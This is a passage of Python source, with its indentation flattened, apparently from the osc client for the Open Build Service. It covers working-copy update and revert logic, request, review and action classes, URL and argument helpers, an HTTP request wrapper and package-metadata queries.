print(statfrmt('D', os.path.join(pathn, f.name)))
if f.name in self.to_be_deleted:
self.to_be_deleted.remove(f.name)
self.write_deletelist()
elif f.name in self.in_conflict:
self.in_conflict.remove(f.name)
self.write_conflictlist()
for f in kept:
state = self.status(f.name)
# print f.name, state
if state == 'M' and self.findfilebyname(f.name).md5 == f.md5:
# remote file didn't change
pass
elif state == 'M':
# try to merge changes
merge_status = self.mergefile(f.name, rev, f.mtime)
print(statfrmt(merge_status, os.path.join(pathn, f.name)))
elif state == '!':
self.updatefile(f.name, rev, f.mtime)
print('Restored \'%s\'' % os.path.join(pathn, f.name))
elif state == 'C':
get_source_file(self.apiurl, self.prjname, self.name, f.name,
targetfilename=os.path.join(self.storedir, f.name), revision=rev,
progress_obj=self.progress_obj, mtime=f.mtime, meta=self.meta)
print('skipping \'%s\' (this is due to conflicts)' % f.name)
elif state == 'D' and self.findfilebyname(f.name).md5 != f.md5:
# XXX: in the worst case we might end up with f.name being
# in _to_be_deleted and in _in_conflict... this needs to be checked
if os.path.exists(os.path.join(self.absdir, f.name)):
merge_status = self.mergefile(f.name, rev, f.mtime)
print(statfrmt(merge_status, os.path.join(pathn, f.name)))
if merge_status == 'C':
# state changes from delete to conflict
self.to_be_deleted.remove(f.name)
self.write_deletelist()
else:
# XXX: we cannot recover this case because we've no file
# to backup
self.updatefile(f.name, rev, f.mtime)
print(statfrmt('U', os.path.join(pathn, f.name)))
elif state == ' ' and self.findfilebyname(f.name).md5 != f.md5:
self.updatefile(f.name, rev, f.mtime)
print(statfrmt('U', os.path.join(pathn, f.name)))
# checkout service files
for f in services:
get_source_file(self.apiurl, self.prjname, self.name, f.name,
targetfilename=os.path.join(self.absdir, f.name), revision=rev,
progress_obj=self.progress_obj, mtime=f.mtime, meta=self.meta)
print(statfrmt('A', os.path.join(pathn, f.name)))
store_write_string(self.absdir, '_files', fm + '\n')
if not self.meta:
self.update_local_pacmeta()
self.update_datastructs()
print('At revision %s.' % self.rev)
def run_source_services(self, mode=None, singleservice=None, verbose=None):
if self.name.startswith("_"):
return 0
curdir = os.getcwd()
os.chdir(self.absdir) # e.g. /usr/lib/obs/service/verify_file fails if not inside the project dir.
si = Serviceinfo()
if os.path.exists('_service'):
if self.filenamelist.count('_service') or self.filenamelist_unvers.count('_service'):
try:
service = ET.parse(os.path.join(self.absdir, '_service')).getroot()
except ET.ParseError as v:
line, column = v.position
print('XML error in _service file on line %s, column %s' % (line, column))
sys.exit(1)
si.read(service)
si.getProjectGlobalServices(self.apiurl, self.prjname, self.name)
r = si.execute(self.absdir, mode, singleservice, verbose)
os.chdir(curdir)
return r
def revert(self, filename):
if not filename in self.filenamelist and not filename in self.to_be_added:
raise oscerr.OscIOError(None, 'file \'%s\' is not under version control' % filename)
elif filename in self.skipped:
raise oscerr.OscIOError(None, 'file \'%s\' is marked as skipped and cannot be reverted' % filename)
if filename in self.filenamelist and not os.path.exists(os.path.join(self.storedir, filename)):
raise oscerr.PackageInternalError('file \'%s\' is listed in filenamelist but no storefile exists' % filename)
state = self.status(filename)
if not (state == 'A' or state == '!' and filename in self.to_be_added):
shutil.copyfile(os.path.join(self.storedir, filename), os.path.join(self.absdir, filename))
if state == 'D':
self.to_be_deleted.remove(filename)
self.write_deletelist()
elif state == 'C':
self.clear_from_conflictlist(filename)
elif state in ('A', 'R') or state == '!' and filename in self.to_be_added:
self.to_be_added.remove(filename)
self.write_addlist()
@staticmethod
def init_package(apiurl, project, package, dir, size_limit=None, meta=False, progress_obj=None):
global store
if not os.path.exists(dir):
os.mkdir(dir)
elif not os.path.isdir(dir):
raise oscerr.OscIOError(None, 'error: \'%s\' is no directory' % dir)
if os.path.exists(os.path.join(dir, store)):
raise oscerr.OscIOError(None, 'error: \'%s\' is already an initialized osc working copy' % dir)
else:
os.mkdir(os.path.join(dir, store))
store_write_project(dir, project)
store_write_string(dir, '_package', package + '\n')
store_write_apiurl(dir, apiurl)
if meta:
store_write_string(dir, '_meta_mode', '')
if size_limit:
store_write_string(dir, '_size_limit', str(size_limit) + '\n')
store_write_string(dir, '_files', '<directory />' + '\n')
store_write_string(dir, '_osclib_version', __store_version__ + '\n')
return Package(dir, progress_obj=progress_obj, size_limit=size_limit)
class AbstractState:
"""
Base class which represents state-like objects (<review />, <state />).
"""
def __init__(self, tag):
self.__tag = tag
def get_node_attrs(self):
"""return attributes for the tag/element"""
raise NotImplementedError()
def get_node_name(self):
"""return tag/element name"""
return self.__tag
def get_comment(self):
"""return data from <comment /> tag"""
raise NotImplementedError()
def get_description(self):
"""return data from <description /> tag"""
raise NotImplementedError()
def to_xml(self):
"""serialize object to XML"""
root = ET.Element(self.get_node_name())
for attr in self.get_node_attrs():
val = getattr(self, attr)
if not val is None:
root.set(attr, val)
if self.get_description():
ET.SubElement(root, 'description').text = self.get_description()
if self.get_comment():
ET.SubElement(root, 'comment').text = self.get_comment()
return root
def to_str(self):
"""return "pretty" XML data"""
root = self.to_xml()
xmlindent(root)
return ET.tostring(root, encoding=ET_ENCODING)
class ReviewState(AbstractState):
"""Represents the review state in a request"""
def __init__(self, review_node):
if not review_node.get('state'):
raise oscerr.APIError('invalid review node (state attr expected): %s' % \
ET.tostring(review_node, encoding=ET_ENCODING))
AbstractState.__init__(self, review_node.tag)
self.state = review_node.get('state')
self.by_user = review_node.get('by_user')
self.by_group = review_node.get('by_group')
self.by_project = review_node.get('by_project')
self.by_package = review_node.get('by_package')
self.who = review_node.get('who')
self.when = review_node.get('when')
self.comment = ''
if not review_node.find('comment') is None and \
review_node.find('comment').text:
self.comment = review_node.find('comment').text.strip()
def get_node_attrs(self):
return ('state', 'by_user', 'by_group', 'by_project', 'by_package', 'who', 'when')
def get_comment(self):
return self.comment
def get_description(self):
return None
class RequestHistory(AbstractState):
"""Represents a history element of a request"""
re_name = re.compile(r'^Request (?:got )?([^\s]+)$')
def __init__(self, history_node):
AbstractState.__init__(self, history_node.tag)
self.who = history_node.get('who')
self.when = history_node.get('when')
if not history_node.find('description') is None and \
history_node.find('description').text:
# OBS 2.6
self.description = history_node.find('description').text.strip()
else:
# OBS 2.5 and before
self.description = history_node.get('name')
self.comment = ''
if not history_node.find('comment') is None and \
history_node.find('comment').text:
self.comment = history_node.find('comment').text.strip()
self.name = self._parse_name(history_node)
def _parse_name(self, history_node):
name = history_node.get('name', None)
if name is not None:
# OBS 2.5 and before
return name
mo = self.re_name.search(self.description)
if mo is not None:
return mo.group(1)
return self.description
def get_node_attrs(self):
return ('who', 'when')
def get_description(self):
return self.description
def get_comment(self):
return self.comment
class RequestState(AbstractState):
"""Represents the state of a request"""
def __init__(self, state_node):
if not state_node.get('name'):
raise oscerr.APIError('invalid request state node (name attr expected): %s' % \
ET.tostring(state_node, encoding=ET_ENCODING))
AbstractState.__init__(self, state_node.tag)
self.name = state_node.get('name')
self.who = state_node.get('who')
self.when = state_node.get('when')
if state_node.find('description') is None:
# OBS 2.6 has it always, before it did not exist
self.description = state_node.get('description')
self.comment = ''
if not state_node.find('comment') is None and \
state_node.find('comment').text:
self.comment = state_node.find('comment').text.strip()
def get_node_attrs(self):
return ('name', 'who', 'when')
def get_comment(self):
return self.comment
def get_description(self):
return None
class Action:
"""
Represents a <action /> element of a Request.
This class is quite common so that it can be used for all different
action types. Note: instances only provide attributes for their specific
type.
Examples:
r = Action('set_bugowner', tgt_project='foo', person_name='buguser')
# available attributes: r.type (== 'set_bugowner'), r.tgt_project (== 'foo'), r.tgt_package (== None)
r.to_str() ->
<action type="set_bugowner">
<target project="foo" />
<person name="buguser" />
</action>
##
r = Action('delete', tgt_project='foo', tgt_package='bar')
# available attributes: r.type (== 'delete'), r.tgt_project (== 'foo'), r.tgt_package (=='bar')
r.to_str() ->
<action type="delete">
<target package="bar" project="foo" />
</action>
"""
# allowed types + the corresponding (allowed) attributes
type_args = {'submit': ('src_project', 'src_package', 'src_rev', 'tgt_project', 'tgt_package', 'opt_sourceupdate',
'acceptinfo_rev', 'acceptinfo_srcmd5', 'acceptinfo_xsrcmd5', 'acceptinfo_osrcmd5',
'acceptinfo_oxsrcmd5', 'opt_updatelink', 'opt_makeoriginolder'),
'add_role': ('tgt_project', 'tgt_package', 'person_name', 'person_role', 'group_name', 'group_role'),
'set_bugowner': ('tgt_project', 'tgt_package', 'person_name', 'group_name'),
'maintenance_release': ('src_project', 'src_package', 'src_rev', 'tgt_project', 'tgt_package', 'person_name',
'acceptinfo_rev', 'acceptinfo_srcmd5', 'acceptinfo_xsrcmd5', 'acceptinfo_osrcmd5',
'acceptinfo_oxsrcmd5', 'acceptinfo_oproject', 'acceptinfo_opackage'),
'maintenance_incident': ('src_project', 'src_package', 'src_rev', 'tgt_project', 'tgt_package', 'tgt_releaseproject', 'person_name', 'opt_sourceupdate', 'opt_makeoriginolder',
'acceptinfo_rev', 'acceptinfo_srcmd5', 'acceptinfo_xsrcmd5', 'acceptinfo_osrcmd5',
'acceptinfo_oxsrcmd5'),
'delete': ('tgt_project', 'tgt_package', 'tgt_repository'),
'change_devel': ('src_project', 'src_package', 'tgt_project', 'tgt_package'),
'group': ('grouped_id', )}
# attribute prefix to element name map (only needed for abbreviated attributes)
prefix_to_elm = {'src': 'source', 'tgt': 'target', 'opt': 'options'}
def __init__(self, type, **kwargs):
if not type in Action.type_args.keys():
raise oscerr.WrongArgs('invalid action type: \'%s\'' % type)
self.type = type
for i in kwargs.keys():
if not i in Action.type_args[type]:
raise oscerr.WrongArgs('invalid argument: \'%s\'' % i)
# set all type specific attributes
for i in Action.type_args[type]:
setattr(self, i, kwargs.get(i))
def to_xml(self):
"""
Serialize object to XML.
The xml tag names and attributes are constructed from the instance's attributes.
Example:
self.group_name -> tag name is "group", attribute name is "name"
self.src_project -> tag name is "source" (translated via prefix_to_elm dict),
attribute name is "project"
Attributes prefixed with "opt_" need a special handling, the resulting xml should
look like this: opt_updatelink -> <options><updatelink>value</updatelink></options>.
Attributes which are "None" will be skipped.
"""
root = ET.Element('action', type=self.type)
for i in Action.type_args[self.type]:
prefix, attr = i.split('_', 1)
vals = getattr(self, i)
# single, plain elements are _not_ stored in a list
plain = False
if vals is None:
continue
elif not hasattr(vals, 'append'):
vals = [vals]
plain = True
for val in vals:
elm = root.find(Action.prefix_to_elm.get(prefix, prefix))
if elm is None or not plain:
elm = ET.Element(Action.prefix_to_elm.get(prefix, prefix))
root.append(elm)
if prefix == 'opt':
ET.SubElement(elm, attr).text = val
else:
elm.set(attr, val)
return root
def to_str(self):
"""return "pretty" XML data"""
root = self.to_xml()
xmlindent(root)
return ET.tostring(root, encoding=ET_ENCODING)
@staticmethod
def from_xml(action_node):
"""create action from XML"""
if action_node is None or \
not action_node.get('type') in Action.type_args.keys() or \
not action_node.tag in ('action', 'submit'):
raise oscerr.WrongArgs('invalid argument')
elm_to_prefix = dict([(i[1], i[0]) for i in Action.prefix_to_elm.items()])
kwargs = {}
for node in action_node:
prefix = elm_to_prefix.get(node.tag, node.tag)
if prefix == 'opt':
data = [('opt_%s' % opt.tag, opt.text.strip()) for opt in node if opt.text]
else:
data = [('%s_%s' % (prefix, k), v) for k, v in node.items()]
# it would be easier to store everything in a list but in
# this case we would lose some "structure" (see to_xml)
for k, v in data:
if k in kwargs:
l = kwargs[k]
if not hasattr(l, 'append'):
l = [l]
kwargs[k] = l
l.append(v)
else:
kwargs[k] = v
return Action(action_node.get('type'), **kwargs)
class Request:
"""Represents a request (<request />)"""
def __init__(self):
self._init_attributes()
def _init_attributes(self):
"""initialize attributes with default values"""
self.reqid = None
self.creator = ''
self.title = ''
self.description = ''
self.priority = None
self.state = None
self.accept_at = None
self.actions = []
self.statehistory = []
self.reviews = []
def read(self, root):
"""read in a request"""
self._init_attributes()
if not root.get('id'):
raise oscerr.APIError('invalid request: %s\n' % ET.tostring(root, encoding=ET_ENCODING))
self.reqid = root.get('id')
if root.get('creator'):
# OBS 2.8 and later is delivering creator informations
self.creator = root.get('creator')
if root.find('state') is None:
raise oscerr.APIError('invalid request (state expected): %s\n' % ET.tostring(root, encoding=ET_ENCODING))
self.state = RequestState(root.find('state'))
action_nodes = root.findall('action')
if not action_nodes:
# check for old-style requests
for i in root.findall('submit'):
i.set('type', 'submit')
action_nodes.append(i)
for action in action_nodes:
self.actions.append(Action.from_xml(action))
for review in root.findall('review'):
self.reviews.append(ReviewState(review))
for history_element in root.findall('history'):
self.statehistory.append(RequestHistory(history_element))
if not root.find('priority') is None and root.find('priority').text:
self.priority = root.find('priority').text.strip()
if not root.find('accept_at') is None and root.find('accept_at').text:
self.accept_at = root.find('accept_at').text.strip()
if not root.find('title') is None:
self.title = root.find('title').text.strip()
if not root.find('description') is None and root.find('description').text:
self.description = root.find('description').text.strip()
def add_action(self, type, **kwargs):
"""add a new action to the request"""
self.actions.append(Action(type, **kwargs))
def get_actions(self, *types):
"""
get all actions with a specific type
(if types is empty return all actions)
"""
if not types:
return self.actions
return [i for i in self.actions if i.type in types]
def get_creator(self):
"""Return the creator of the request.
This method is deprecated (use "creator" attribute instead").
"""
return self.creator
def to_xml(self):
"""serialize object to XML"""
root = ET.Element('request')
if self.reqid is not None:
root.set('id', self.reqid)
if self.creator:
root.set('creator', self.creator)
for action in self.actions:
root.append(action.to_xml())
if not self.state is None:
root.append(self.state.to_xml())
for review in self.reviews:
root.append(review.to_xml())
for hist in self.statehistory:
root.append(hist.to_xml())
if self.title:
ET.SubElement(root, 'title').text = self.title
if self.description:
ET.SubElement(root, 'description').text = self.description
if self.accept_at:
ET.SubElement(root, 'accept_at').text = self.accept_at
if self.priority:
ET.SubElement(root, 'priority').text = self.priority
return root
def to_str(self):
"""return "pretty" XML data"""
root = self.to_xml()
xmlindent(root)
return ET.tostring(root, encoding=ET_ENCODING)
def accept_at_in_hours(self, hours):
"""set auto accept_at time"""
import datetime
now = datetime.datetime.utcnow()
now = now + datetime.timedelta(hours=hours)
self.accept_at = now.isoformat()
@staticmethod
def format_review(review, show_srcupdate=False):
"""
format a review depending on the reviewer's type.
A dict which contains the formatted str's is returned.
"""
d = {'state': '%s:' % review.state}
if review.by_package:
d['by'] = '%s/%s' % (review.by_project, review.by_package)
d['type'] = 'Package'
elif review.by_project:
d['by'] = '%s' % review.by_project
d['type'] = 'Project'
elif review.by_group:
d['by'] = '%s' % review.by_group
d['type'] = 'Group'
else:
d['by'] = '%s' % review.by_user
d['type'] = 'User'
if review.who:
d['by'] += '(%s)' % review.who
return d
def format_action(self, action, show_srcupdate=False):
"""
format an action depending on the action's type.
A dict which contains the formatted str's is returned.
"""
def prj_pkg_join(prj, pkg, repository=None):
if not pkg:
if not repository:
return prj or ''
return '%s(%s)' % (prj, repository)
return '%s/%s' % (prj, pkg)
d = {'type': '%s:' % action.type}
if action.type == 'set_bugowner':
if action.person_name:
d['source'] = action.person_name
if action.group_name:
d['source'] = 'group:%s' % action.group_name
d['target'] = prj_pkg_join(action.tgt_project, action.tgt_package)
elif action.type == 'change_devel':
d['source'] = prj_pkg_join(action.tgt_project, action.tgt_package)
d['target'] = 'developed in %s' % prj_pkg_join(action.src_project, action.src_package)
elif action.type == 'maintenance_incident':
d['source'] = '%s ->' % action.src_project
if action.src_package:
d['source'] = '%s' % prj_pkg_join(action.src_project, action.src_package)
if action.src_rev:
d['source'] = d['source'] + '@%s' % action.src_rev
d['source'] = d['source'] + ' ->'
d['target'] = action.tgt_project
if action.tgt_releaseproject:
d['target'] += " (release in " + action.tgt_releaseproject + ")"
srcupdate = ' '
if action.opt_sourceupdate and show_srcupdate:
srcupdate = '(%s)' % action.opt_sourceupdate
elif action.type == 'maintenance_release':
d['source'] = '%s' % prj_pkg_join(action.src_project, action.src_package)
if action.src_rev:
d['source'] = d['source'] + '@%s' % action.src_rev
d['source'] = d['source'] + ' ->'
d['target'] = prj_pkg_join(action.tgt_project, action.tgt_package)
elif action.type == 'submit':
d['source'] = '%s' % prj_pkg_join(action.src_project, action.src_package)
if action.src_rev:
d['source'] = d['source'] + '@%s' % action.src_rev
if action.opt_sourceupdate and show_srcupdate:
d['source'] = d['source'] + '(%s)' % action.opt_sourceupdate
d['source'] = d['source'] + ' ->'
tgt_package = action.tgt_package
if action.src_package == action.tgt_package:
tgt_package = ''
d['target'] = prj_pkg_join(action.tgt_project, tgt_package)
if action.opt_makeoriginolder:
d['target'] = d['target'] + ' ***make origin older***'
if action.opt_updatelink:
d['target'] = d['target'] + ' ***update link***'
elif action.type == 'add_role':
roles = []
if action.person_name and action.person_role:
roles.append('person: %s as %s' % (action.person_name, action.person_role))
if action.group_name and action.group_role:
roles.append('group: %s as %s' % (action.group_name, action.group_role))
d['source'] = ', '.join(roles)
d['target'] = prj_pkg_join(action.tgt_project, action.tgt_package)
elif action.type == 'delete':
d['source'] = ''
d['target'] = prj_pkg_join(action.tgt_project, action.tgt_package, action.tgt_repository)
elif action.type == 'group':
l = action.grouped_id
if l is None:
# there may be no requests in a group action
l = ''
if not hasattr(l, 'append'):
l = [l]
d['source'] = ', '.join(l) + ' ->'
d['target'] = self.reqid
else:
raise oscerr.APIError('Unknown action type %s\n' % action.type)
return d
def list_view(self):
"""return "list view" format"""
import textwrap
lines = ['%6s State:%-10s By:%-12s When:%-19s' % (self.reqid, self.state.name, self.state.who, self.state.when)]
tmpl = ' %(type)-16s %(source)-50s %(target)s'
for action in self.actions:
lines.append(tmpl % self.format_action(action))
tmpl = ' Review by %(type)-10s is %(state)-10s %(by)-50s'
for review in self.reviews:
lines.append(tmpl % Request.format_review(review))
history = ['%s: %s' % (hist.description, hist.who) for hist in self.statehistory]
if history:
lines.append(' From: %s' % ' -> '.join(history))
if self.description:
lines.append(textwrap.fill(self.description, width=80, initial_indent=' Descr: ',
subsequent_indent=' '))
lines.append(textwrap.fill(self.state.comment, width=80, initial_indent=' Comment: ',
subsequent_indent=' '))
return '\n'.join(lines)
def __str__(self):
"""return "detailed" format"""
lines = ['Request: #%s\n' % self.reqid]
if self.accept_at and self.state.name in [ 'new', 'review' ]:
lines.append(' *** This request will get automatically accepted after '+self.accept_at+' ! ***\n')
if self.priority in [ 'critical', 'important' ] and self.state.name in [ 'new', 'review' ]:
lines.append(' *** This request has classified as '+self.priority+' ! ***\n')
for action in self.actions:
tmpl = ' %(type)-13s %(source)s %(target)s'
if action.type == 'delete':
# remove 1 whitespace because source is empty
tmpl = ' %(type)-12s %(source)s %(target)s'
lines.append(tmpl % self.format_action(action, show_srcupdate=True))
lines.append('\n\nMessage:')
if self.description:
lines.append(self.description)
else:
lines.append('<no message>')
if self.state:
lines.append('\nState: %-10s %-12s %s' % (self.state.name, self.state.when, self.state.who))
lines.append('Comment: %s' % (self.state.comment or '<no comment>'))
indent = '\n '
tmpl = '%(state)-10s %(by)-50s %(when)-12s %(who)-20s %(comment)s'
reviews = []
for review in reversed(self.reviews):
d = {'state': review.state}
if review.by_user:
d['by'] = "User: " + review.by_user
if review.by_group:
d['by'] = "Group: " + review.by_group
if review.by_package:
d['by'] = "Package: " + review.by_project + "/" + review.by_package
elif review.by_project:
d['by'] = "Project: " + review.by_project
d['when'] = review.when or ''
d['who'] = review.who or ''
d['comment'] = ''
if review.comment:
d['comment'] = '\n ' + review.comment
reviews.append(tmpl % d)
if reviews:
lines.append('\nReview: %s' % indent.join(reviews))
tmpl = '%(when)-10s %(who)-12s %(desc)s'
histories = []
for hist in reversed(self.statehistory):
d = {'when': hist.when, 'who': hist.who, 'desc': hist.description}
histories.append(tmpl % d)
if histories:
lines.append('\nHistory: %s' % indent.join(histories))
return '\n'.join(lines)
def __cmp__(self, other):
return cmp(int(self.reqid), int(other.reqid))
def create(self, apiurl, addrevision=False):
"""create a new request"""
query = {'cmd' : 'create' }
if addrevision:
query['addrevision'] = "1"
u = makeurl(apiurl, ['request'], query=query)
f = http_POST(u, data=self.to_str())
root = ET.fromstring(f.read())
self.read(root)
def shorttime(t):
"""format time as Apr 02 18:19
or Apr 02 2005
depending on whether it is in the current year
"""
import time
if time.gmtime()[0] == time.gmtime(t)[0]:
# same year
return time.strftime('%b %d %H:%M', time.gmtime(t))
else:
return time.strftime('%b %d %Y', time.gmtime(t))
def is_project_dir(d):
global store
return os.path.exists(os.path.join(d, store, '_project')) and not \
os.path.exists(os.path.join(d, store, '_package'))
def is_package_dir(d):
global store
return os.path.exists(os.path.join(d, store, '_project')) and \
os.path.exists(os.path.join(d, store, '_package'))
def parse_disturl(disturl):
"""Parse a disturl, returns tuple (apiurl, project, source, repository,
revision), else raises an oscerr.WrongArgs exception
"""
global DISTURL_RE
m = DISTURL_RE.match(disturl)
if not m:
raise oscerr.WrongArgs("`%s' does not look like disturl" % disturl)
apiurl = m.group('apiurl')
if apiurl.split('.')[0] != 'api':
apiurl = 'https://api.' + ".".join(apiurl.split('.')[1:])
return (apiurl, m.group('project'), m.group('source'), m.group('repository'), m.group('revision'))
def parse_buildlogurl(buildlogurl):
"""Parse a build log url, returns a tuple (apiurl, project, package,
repository, arch), else raises oscerr.WrongArgs exception"""
global BUILDLOGURL_RE
m = BUILDLOGURL_RE.match(buildlogurl)
if not m:
raise oscerr.WrongArgs('\'%s\' does not look like url with a build log' % buildlogurl)
return (m.group('apiurl'), m.group('project'), m.group('package'), m.group('repository'), m.group('arch'))
def slash_split(l):
"""Split command line arguments like 'foo/bar' into 'foo' 'bar'.
This is handy to allow copy/paste a project/package combination in this form.
Trailing slashes are removed before the split, because the split would
otherwise give an additional empty string.
"""
r = []
for i in l:
i = i.rstrip('/')
r += i.split('/')
return r
def expand_proj_pack(args, idx=0, howmany=0):
"""looks for occurance of '.' at the position idx.
If howmany is 2, both proj and pack are expanded together
using the current directory, or none of them if not possible.
If howmany is 0, proj is expanded if possible, then, if there
is no idx+1 element in args (or args[idx+1] == '.'), pack is also
expanded, if possible.
If howmany is 1, only proj is expanded if possible.
If args[idx] does not exist, an implicit '.' is assumed.
If not enough elements up to idx exist, an error is raised.
See also parseargs(args), slash_split(args), findpacs(args)
All these need unification, somehow.
"""
# print args,idx,howmany
if len(args) < idx:
raise oscerr.WrongArgs('not enough argument, expected at least %d' % idx)
if len(args) == idx:
args += '.'
if args[idx+0] == '.':
if howmany == 0 and len(args) > idx+1:
if args[idx+1] == '.':
# we have two dots.
# remove one dot and make sure to expand both proj and pack
args.pop(idx+1)
howmany = 2
else:
howmany = 1
# print args,idx,howmany
args[idx+0] = store_read_project('.')
if howmany == 0:
try:
package = store_read_package('.')
args.insert(idx+1, package)
except:
pass
elif howmany == 2:
package = store_read_package('.')
args.insert(idx+1, package)
return args
def findpacs(files, progress_obj=None, fatal=True):
"""collect Package objects belonging to the given files
and make sure each Package is returned only once"""
pacs = []
no_pacs = []
for f in files:
try:
p = filedir_to_pac(f, progress_obj)
except oscerr.OscBaseError as e:
if fatal:
raise e
no_pacs.append(f)
continue
known = None
for i in pacs:
if i.name == p.name and i.prjname == p.prjname:
known = i
break
if known:
i.merge(p)
else:
pacs.append(p)
if not fatal:
return pacs, no_pacs
return pacs
def filedir_to_pac(f, progress_obj=None):
"""Takes a working copy path, or a path to a file inside a working copy,
and returns a Package object instance
If the argument was a filename, add it onto the "todo" list of the Package """
if os.path.isdir(f):
wd = f
p = Package(wd, progress_obj=progress_obj)
else:
wd = os.path.dirname(f) or os.curdir
p = Package(wd, progress_obj=progress_obj)
p.todo = [ os.path.basename(f) ]
return p
def read_filemeta(dir):
global store
msg = '\'%s\' is not a valid working copy.' % dir
filesmeta = os.path.join(dir, store, '_files')
if not is_package_dir(dir):
raise oscerr.NoWorkingCopy(msg)
if not os.path.isfile(filesmeta):
raise oscerr.NoWorkingCopy('%s (%s does not exist)' % (msg, filesmeta))
try:
r = ET.parse(filesmeta)
except SyntaxError as e:
raise oscerr.NoWorkingCopy('%s\nWhen parsing .osc/_files, the following error was encountered:\n%s' % (msg, e))
return r
def store_readlist(dir, name):
global store
r = []
if os.path.exists(os.path.join(dir, store, name)):
r = [line.rstrip('\n') for line in open(os.path.join(dir, store, name), 'r')]
return r
def read_tobeadded(dir):
return store_readlist(dir, '_to_be_added')
def read_tobedeleted(dir):
return store_readlist(dir, '_to_be_deleted')
def read_sizelimit(dir):
global store
r = None
fname = os.path.join(dir, store, '_size_limit')
if os.path.exists(fname):
r = open(fname).readline().strip()
if r is None or not r.isdigit():
return None
return int(r)
def read_inconflict(dir):
return store_readlist(dir, '_in_conflict')
def parseargs(list_of_args):
"""Convenience method osc's commandline argument parsing.
If called with an empty tuple (or list), return a list containing the current directory.
Otherwise, return a list of the arguments."""
if list_of_args:
return list(list_of_args)
else:
return [os.curdir]
def statfrmt(statusletter, filename):
return '%s %s' % (statusletter, filename)
def pathjoin(a, *p):
"""Join two or more pathname components, inserting '/' as needed. Cut leading ./"""
path = os.path.join(a, *p)
if path.startswith('./'):
path = path[2:]
return path
def makeurl(baseurl, l, query=[]):
"""Given a list of path compoments, construct a complete URL.
Optional parameters for a query string can be given as a list, as a
dictionary, or as an already assembled string.
In case of a dictionary, the parameters will be urlencoded by this
function. In case of a list not -- this is to be backwards compatible.
"""
if conf.config['verbose'] > 1:
print('makeurl:', baseurl, l, query)
if isinstance(query, type(list())):
query = '&'.join(query)
elif isinstance(query, type(dict())):
query = urlencode(query)
scheme, netloc, path = urlsplit(baseurl)[0:3]
return urlunsplit((scheme, netloc, '/'.join([path] + list(l)), query, ''))
def http_request(method, url, headers={}, data=None, file=None):
"""wrapper around urllib2.urlopen for error handling,
and to support additional (PUT, DELETE) methods"""
def create_memoryview(obj):
if sys.version_info < (2, 7, 99):
# obj might be a mmap and python 2.7's mmap does not
# behave like a bytearray (a bytearray in turn can be used
# to create the memoryview). For now simply return a buffer
return buffer(obj)
return memoryview(obj)
filefd = None
if conf.config['http_debug']:
print('\n\n--', method, url, file=sys.stderr)
if method == 'POST' and not file and not data:
# adding data to an urllib2 request transforms it into a POST
data = ''
req = URLRequest(url)
api_host_options = {}
apiurl = conf.extract_known_apiurl(url)
if apiurl is not None:
# ok no external request
install_opener(conf._build_opener(apiurl))
api_host_options = conf.get_apiurl_api_host_options(apiurl)
for header, value in api_host_options['http_headers']:
req.add_header(header, value)
req.get_method = lambda: method
# POST requests are application/x-www-form-urlencoded per default
# but sending data requires an octet-stream type
if method == 'PUT' or (method == 'POST' and (data or file)):
req.add_header('Content-Type', 'application/octet-stream')
if isinstance(headers, type({})):
for i in headers.keys():
print(headers[i])
req.add_header(i, headers[i])
if file and not data:
size = os.path.getsize(file)
if size < 1024*512:
data = open(file, 'rb').read()
else:
import mmap
filefd = open(file, 'rb')
try:
if sys.platform[:3] != 'win':
data = mmap.mmap(filefd.fileno(), os.path.getsize(file), mmap.MAP_SHARED, mmap.PROT_READ)
else:
data = mmap.mmap(filefd.fileno(), os.path.getsize(file))
data = create_memoryview(data)
except EnvironmentError as e:
if e.errno == 19:
sys.exit('\n\n%s\nThe file \'%s\' could not be memory mapped. It is ' \
'\non a filesystem which does not support this.' % (e, file))
elif hasattr(e, 'winerror') and e.winerror == 5:
# falling back to the default io
data = open(file, 'rb').read()
else:
raise
if conf.config['debug']: print(method, url, file=sys.stderr)
try:
if isinstance(data, str):
data = bytes(data, "utf-8")
fd = urlopen(req, data=data)
finally:
if hasattr(conf.cookiejar, 'save'):
conf.cookiejar.save(ignore_discard=True)
if filefd: filefd.close()
return fd
def http_GET(*args, **kwargs): return http_request('GET', *args, **kwargs)
def http_POST(*args, **kwargs): return http_request('POST', *args, **kwargs)
def http_PUT(*args, **kwargs): return http_request('PUT', *args, **kwargs)
def http_DELETE(*args, **kwargs): return http_request('DELETE', *args, **kwargs)
def check_store_version(dir):
global store
versionfile = os.path.join(dir, store, '_osclib_version')
try:
v = open(versionfile).read().strip()
except:
v = ''
if v == '':
msg = 'Error: "%s" is not an osc package working copy.' % os.path.abspath(dir)
if os.path.exists(os.path.join(dir, '.svn')):
msg = msg + '\nTry svn instead of osc.'
raise oscerr.NoWorkingCopy(msg)
if v != __store_version__:
if v in ['0.2', '0.3', '0.4', '0.5', '0.6', '0.7', '0.8', '0.9', '0.95', '0.96', '0.97', '0.98', '0.99']:
# version is fine, no migration needed
f = open(versionfile, 'w')
f.write(__store_version__ + '\n')
f.close()
return
msg = 'The osc metadata of your working copy "%s"' % dir
msg += '\nhas __store_version__ = %s, but it should be %s' % (v, __store_version__)
msg += '\nPlease do a fresh checkout or update your client. Sorry about the inconvenience.'
raise oscerr.WorkingCopyWrongVersion(msg)
def meta_get_packagelist(apiurl, prj, deleted=None, expand=False):
query = {}
if deleted:
query['deleted'] = 1
if expand:
query['expand'] = 1
u = makeurl(apiurl, ['source', prj], query)
f = http_GET(u)
root = ET.parse(f).getroot()
return [ node.get('name') for node in root.findall('entry') ]
def meta_get_filelist(apiurl, prj, package, verbose=False, expand=False, revision=None, meta=False, deleted=False):
"""return a list of file names,
or a list File() instances if verbose=True"""
query = {}
if deleted:
query['deleted'] = 1
if expand:
query['expand'] = 1
if meta:
query['meta'] = 1
if revision:
query['rev'] = revision
else:
query['rev'] = 'latest'
u = makeurl(apiurl, ['source', prj, package], query=query)
f = http_GET(u)
root = ET.parse(f).getroot()
if not verbose:
return [ node.get('name') for node in root.findall('entry') ]
else:
l = []
# rev = int(root.get('rev')) # don't force int. also allow srcmd5 here.
rev = root.get('rev')
for node in root.findall('entry'):
f = File(node.get('name'),
node.get('md5'),
int(node.get('size')),
int(node.get('mtime')))
f.rev = rev
l.append(f)
return l
def meta_get_project_list(apiurl, deleted=None):
query = {}
if deleted:
query['deleted'] = 1
u = makeurl(apiurl, ['source'], query)
f = http_GET(u)
root = ET.parse(f).getroot()
return sorted([ node.get('name') for node in root if node.get('name')])
def show_project_meta(apiurl, prj, rev=None, blame=None):
query = {}
if blame:
query['view'] = "blame"
if rev:
query['rev'] = rev
